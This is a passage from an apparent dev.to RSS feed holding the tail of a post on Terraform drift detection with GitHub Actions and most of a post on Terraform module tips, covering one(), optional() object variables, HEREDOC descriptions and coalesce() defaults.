              &lt;span class="s"&gt;});&lt;/span&gt;

              &lt;span class="s"&gt;console.log(`Updated existing issue #${existingIssue.number}`);&lt;/span&gt;
            &lt;span class="s"&gt;} else {&lt;/span&gt;
              &lt;span class="s"&gt;// Create new issue&lt;/span&gt;
              &lt;span class="s"&gt;const newIssue = await github.rest.issues.create({&lt;/span&gt;
                &lt;span class="s"&gt;owner: context.repo.owner,&lt;/span&gt;
                &lt;span class="s"&gt;repo: context.repo.repo,&lt;/span&gt;
                &lt;span class="s"&gt;title: title,&lt;/span&gt;
                &lt;span class="s"&gt;body: driftBody,&lt;/span&gt;
                &lt;span class="s"&gt;labels: ['terraform', 'drift-detection', 'needs-review']&lt;/span&gt;
              &lt;span class="s"&gt;});&lt;/span&gt;

              &lt;span class="s"&gt;console.log(`Created new issue #${newIssue.data.number}`);&lt;/span&gt;
            &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Key Benefits
&lt;/h2&gt;

&lt;p&gt;This approach provides several engineering advantages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Zero External Dependencies&lt;/strong&gt;: No third-party SaaS tools or agents required&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Native Exit Code Logic&lt;/strong&gt;: Leverages Terraform's &lt;code&gt;detailed-exitcode&lt;/code&gt; for precise drift detection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Parallel Execution&lt;/strong&gt;: Matrix strategy enables concurrent checks across multiple environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit Trail&lt;/strong&gt;: GitHub issues provide timestamped drift history and workflow run links&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure Authentication&lt;/strong&gt;: OIDC eliminates static credential management&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost Effective&lt;/strong&gt;: Runs on GitHub Actions free tier for small to medium usage (note that larger deployments with many Terraform directories may exceed free tier limits)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The workflow scales horizontally as you add Terraform directories and provides immediate visibility into infrastructure changes through your existing issue tracking system.&lt;/p&gt;

&lt;h2&gt;
  
  
  Considerations for Production Use
&lt;/h2&gt;

&lt;p&gt;While this workflow provides solid drift detection, you may want to enhance it for production environments:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi-Account Support&lt;/strong&gt;: This example uses a single AWS role. For multi-account setups, consider using a matrix strategy with account-specific roles or dynamic role selection based on directory structure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sensitive Data Handling&lt;/strong&gt;: Implement plan output sanitization if your infrastructure includes secrets or sensitive configuration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Issue Lifecycle Management&lt;/strong&gt;: Add automation to close issues when drift is resolved or implement a reconciliation step to verify fixes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;State Lock Handling&lt;/strong&gt;: The &lt;code&gt;-lock-timeout=5m&lt;/code&gt; provides basic protection, but consider monitoring for persistent lock issues that may indicate state corruption or concurrent modifications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Error Notification&lt;/strong&gt;: Consider adding Slack/email notifications for plan failures in addition to GitHub issues&lt;/li&gt;
&lt;/ul&gt;
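&lt;p&gt;For the multi-account case, one sketch is to swap the discovered-directory matrix for an explicit &lt;code&gt;include&lt;/code&gt; list that pairs each root module with its own role. The ARNs and directory names below are hypothetical placeholders:&lt;/p&gt;

```yaml
# Hypothetical multi-account matrix: each root module maps to an
# account-specific role. ARNs and directories are placeholders.
strategy:
  fail-fast: false
  matrix:
    include:
      - tf_dir: environments/dev
        aws_role: arn:aws:iam::111111111111:role/drift-detection
      - tf_dir: environments/prod
        aws_role: arn:aws:iam::222222222222:role/drift-detection
# ...then reference it in the credentials step:
#   role-to-assume: ${{ matrix.aws_role }}
```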




&lt;p&gt;If you liked (or hated) this blog, feel free to check out my &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>infrastructureascode</category>
      <category>github</category>
      <category>githubactions</category>
    </item>
    <item>
      <title>Terraform Tips from the IaC Trenches</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Tue, 16 Dec 2025 14:31:00 +0000</pubDate>
      <link>https://dev.to/rosesecurity/terraform-tips-from-the-iac-trenches-ipd</link>
      <guid>https://dev.to/rosesecurity/terraform-tips-from-the-iac-trenches-ipd</guid>
      <description>&lt;p&gt;After a few years of writing open-source Terraform modules, I've picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren't revolutionary, but they're simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I've seen in the wild, these techniques seem to be underutilized.&lt;/p&gt;




&lt;h2&gt;
  
  
  Use &lt;code&gt;one()&lt;/code&gt; for Safer Conditional Resource References
&lt;/h2&gt;

&lt;p&gt;When you conditionally create resources with &lt;code&gt;count&lt;/code&gt;, don't reach for &lt;code&gt;[0]&lt;/code&gt; — use &lt;code&gt;one()&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Problem
&lt;/h3&gt;

&lt;p&gt;It's common to use &lt;code&gt;count&lt;/code&gt; with a boolean to conditionally create resources (especially in open-source modules that accommodate a lot of different configuration settings):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_zone"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;create_dns&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"rosesecurity.dev"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_record"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;zone_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;aws_route53_zone&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;zone_id&lt;/span&gt;  &lt;span class="c1"&gt;# ❌ Dangerous&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"blog.rosesecurity.dev"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"A"&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This looks fine and might even work in &lt;code&gt;dev&lt;/code&gt; environments where &lt;code&gt;var.create_dns = true&lt;/code&gt;. But the moment that variable is &lt;code&gt;false&lt;/code&gt; in another environment, you get:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Error: Invalid index

The given key does not identify an element in this collection value:
the collection value is an empty tuple.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The issue? &lt;strong&gt;This only fails when the expression is actually evaluated with &lt;code&gt;create_dns = false&lt;/code&gt;, so no static check warns you ahead of time.&lt;/strong&gt; The code works when the resource exists and breaks when it doesn't.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution
&lt;/h3&gt;

&lt;p&gt;Use &lt;code&gt;one()&lt;/code&gt; with the &lt;code&gt;[*]&lt;/code&gt; splat operator:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_zone"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;create_dns&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"rosesecurity.dev"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_record"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;zone_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;one&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;aws_route53_zone&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;[*].&lt;/span&gt;&lt;span class="nx"&gt;zone_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# ✅ Safe(r)&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"blog.rosesecurity.dev"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"A"&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;one()&lt;/code&gt; function (available in Terraform v0.15+) is designed for this exact pattern:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;If count = 0&lt;/strong&gt;: Returns &lt;code&gt;null&lt;/code&gt; gracefully instead of crashing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;If count = 1&lt;/strong&gt;: Returns the element's value&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;If count ≥ 2&lt;/strong&gt;: Returns an error (catches your mistake early)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;When you use &lt;code&gt;[0]&lt;/code&gt;, you're assuming the resource exists. When you use &lt;code&gt;one()&lt;/code&gt;, you're validating it exists.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Bonus: &lt;code&gt;one()&lt;/code&gt; also works with sets, which don't support index notation at all. Using &lt;code&gt;one()&lt;/code&gt; makes the code more versatile and future-proof.&lt;/p&gt;
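&lt;p&gt;The behavior is easy to confirm in &lt;code&gt;terraform console&lt;/code&gt; (a quick sketch; the error text is abbreviated):&lt;/p&gt;

```
$ terraform console
> one([])
null
> one(toset(["only"]))
"only"
> one(["a", "b"])
Error: Invalid function argument
```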




&lt;h2&gt;
  
  
  Design Better Module Variables with Objects, &lt;code&gt;optional()&lt;/code&gt;, and &lt;code&gt;coalesce()&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;When building reusable Terraform modules, variable design makes the difference between a module that's fun to use and one that's a configuration nightmare. Here's a pattern that combines several Terraform features to create flexible, well-documented, and maintainable module interfaces.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Problem: Scattered Variables
&lt;/h3&gt;

&lt;p&gt;Most modules start simple and grow organically, leading to an explosion of individual variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ❌ Scattered variables - hard to manage and document&lt;/span&gt;
&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch_subdomain_name"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"The name of the subdomain for Elasticsearch"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch_port"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;number&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Port for Elasticsearch"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;9200&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch_enable_ssl"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Enable SSL for Elasticsearch"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"kibana_subdomain_name"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"The name of the subdomain for Kibana"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"kibana_port"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;number&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Port for Kibana"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;5601&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"kibana_enable_ssl"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Enable SSL for Kibana"&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# ... and on and on for 12+ more variables&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This gets unwieldy fast. Users have to understand which variables are related, documentation becomes repetitive, and adding a new service means adding another set of scattered variables.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Group Related Variables into Objects
&lt;/h3&gt;

&lt;p&gt;Use objects with the &lt;code&gt;optional()&lt;/code&gt; function to group logically related settings:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ✅ Grouped by logical component&lt;/span&gt;
&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch_settings"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;object&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;port&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;number&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;9200&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;enable_ssl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="p"&gt;})&lt;/span&gt;

  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;-&lt;/span&gt;&lt;span class="no"&gt;DOC&lt;/span&gt;&lt;span class="sh"&gt;
    Configuration settings for Elasticsearch service.

    subdomain_name: The name of the subdomain for Elasticsearch in the DNS zone (e.g., 'elasticsearch', 'search'). Defaults to 'elasticsearch'.
    port: Port number for Elasticsearch. Defaults to 9200.
    enable_ssl: Enable SSL/TLS for Elasticsearch. Defaults to true.
&lt;/span&gt;&lt;span class="no"&gt;  DOC
&lt;/span&gt;  &lt;span class="nx"&gt;default&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"kibana_settings"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;object&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;port&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;number&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;5601&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;enable_ssl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="p"&gt;})&lt;/span&gt;

  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;-&lt;/span&gt;&lt;span class="no"&gt;DOC&lt;/span&gt;&lt;span class="sh"&gt;
    Configuration settings for Kibana service.

    subdomain_name: The name of the subdomain for Kibana in the DNS zone (e.g., 'kibana', 'ui'). Defaults to 'kibana'.
    port: Port number for Kibana. Defaults to 5601.
    enable_ssl: Enable SSL/TLS for Kibana. Defaults to true.
&lt;/span&gt;&lt;span class="no"&gt;  DOC
&lt;/span&gt;  &lt;span class="nx"&gt;default&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;optional()&lt;/code&gt; function (Terraform v1.3+) lets you define object attributes that users can omit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;string&lt;/span&gt;&lt;span class="err"&gt;)&lt;/span&gt;        &lt;span class="c1"&gt;# Can be omitted, defaults to null&lt;/span&gt;
&lt;span class="nx"&gt;port&lt;/span&gt;           &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;number&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;9200&lt;/span&gt;&lt;span class="err"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# Can be omitted, defaults to 9200&lt;/span&gt;
&lt;span class="nx"&gt;enable_ssl&lt;/span&gt;     &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;optional&lt;/span&gt;&lt;span class="err"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;bool&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="err"&gt;)&lt;/span&gt;    &lt;span class="c1"&gt;# Can be omitted, defaults to true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means users can provide as much or as little configuration as they need:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Minimal - just override subdomain&lt;/span&gt;
&lt;span class="nx"&gt;elasticsearch&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"search"&lt;/span&gt;
  &lt;span class="c1"&gt;# port and enable_ssl use defaults&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Or provide nothing, use all defaults&lt;/span&gt;
&lt;span class="nx"&gt;elasticsearch&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;

&lt;span class="c1"&gt;# Or customize everything&lt;/span&gt;
&lt;span class="nx"&gt;elasticsearch&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"es-prod"&lt;/span&gt;
  &lt;span class="nx"&gt;port&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;9300&lt;/span&gt;
  &lt;span class="nx"&gt;enable_ssl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  HEREDOC Syntax for Documentation
&lt;/h3&gt;

&lt;p&gt;Use &lt;strong&gt;indented HEREDOC&lt;/strong&gt; (&lt;code&gt;&amp;lt;&amp;lt;-DOC&lt;/code&gt;) to document complex object variables:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;-&lt;/span&gt;&lt;span class="no"&gt;DOC&lt;/span&gt;&lt;span class="sh"&gt;
  Configuration settings for Elasticsearch service.

  subdomain_name: The name of the subdomain for Elasticsearch in DNS.
  port: Port number for Elasticsearch. Defaults to 9200.
  enable_ssl: Enable SSL/TLS. Defaults to true.
&lt;/span&gt;&lt;span class="no"&gt;DOC
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why the dash matters:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;&amp;lt;&amp;lt;-DOC&lt;/code&gt; (with dash): Automatically strips leading whitespace, allowing proper indentation&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;&amp;lt;&amp;lt;DOC&lt;/code&gt; (without dash): Preserves all whitespace, breaking terraform-docs parsing and formatting&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The indented version plays nicely with automatic documentation generators like terraform-docs, producing clean, readable output in your README.&lt;/p&gt;

&lt;h3&gt;
  
  
  Smart Defaults with &lt;code&gt;coalesce()&lt;/code&gt; and Context
&lt;/h3&gt;

&lt;p&gt;Combine objects with the &lt;a href="https://github.com/cloudposse/terraform-null-label" rel="noopener noreferrer"&gt;Terraform null label pattern&lt;/a&gt; (context.tf) to provide intelligent defaults:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Use locals to apply coalesce logic&lt;/span&gt;
&lt;span class="nx"&gt;locals&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;elasticsearch_subdomain&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;coalesce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;elasticsearch&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;subdomain_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;module&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
